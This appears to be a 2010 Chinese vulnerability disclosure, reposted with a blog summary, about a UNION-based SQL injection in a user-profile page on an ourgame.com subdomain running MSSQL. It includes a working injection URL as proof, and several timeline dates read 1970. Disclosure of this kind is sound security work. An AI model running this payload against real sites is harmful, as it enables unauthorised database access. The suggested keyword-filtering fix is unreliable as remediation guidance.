漏洞详情
披露状态:
2010-07-26: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-11: 细节向核心白帽子及相关领域专家公开
1970-01-21: 细节向普通白帽子公开
1970-01-31: 细节向实习白帽子公开
2010-08-26: 细节向公众公开
简要描述:
联众世界某网站存在SQL注射漏洞,并支持UNION。
详细说明:
http://mgame.ourgame.com/user_look.aspx?ID=axyypy
存在SQL注射漏洞,支持UNION语句,因为MSSQL数据库,也可对其他库进行注射攻击。
漏洞证明:
http://mgame.ourgame.com/user_look.aspx?ID=axyypy%27%20union%20select%20@@version,%27b%27,%27c%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
修复方案:
过滤注入关键字
该博客详细记录了联众世界网站在2010年遭遇的SQL注射漏洞,从最初通报到公开的详细过程,以及厂商的确认和修复方案——通过过滤关键字防止攻击。漏洞利用了UNION语句针对MSSQL数据库的威胁,值得数据库安全关注。
102

被折叠的 条评论
为什么被折叠?



